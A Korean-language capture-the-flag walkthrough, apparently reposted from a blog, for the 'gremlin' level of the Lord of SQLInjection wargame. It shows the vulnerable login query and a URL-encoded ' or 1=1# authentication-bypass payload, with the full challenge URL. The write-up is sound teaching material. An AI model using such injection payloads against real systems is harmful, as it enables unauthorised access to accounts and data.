Lord of SQLInjection: gremlin
1134 단어 WalkthroughWalkthrough
"select id from prob_gremlin where id=’{$_GET[id]}’ and pw=’{$_GET[pw]}’”;
get 방식으로 받은 변수를 위 코드에 넣어서 쿼리를 실행하고있습니다.
쿼리의 실행 결과가 존재하면 클리어하는 코드가 짜여져있습니다.
싱글 쿼츠를 필터링하고 있지 않으니, id에 'or 1=1를 넣고 뒤를 주석 처리해 조건을 참으로 만들어주겠습니다.
주소에 아래와 같이 입력합니다.
' or 1=1#를 url 인코딩을 통해 %27%20or%201=1%23으로 입력해줍니다.
https://los.rubiya.kr//chall/gremlin_280c5552de8b681110e9287421b834fd.php ?id=%27%20or%201=1%23
gremlin 단계를 클리어했습니다.
Author And Source
이 문제에 관하여(Lord of SQLInjection: gremlin), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://velog.io/@910/Lord-of-SQLInjection-gremlin저자 귀속: 원작자 정보가 원작자 URL에 포함되어 있으며 저작권은 원작자 소유입니다.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)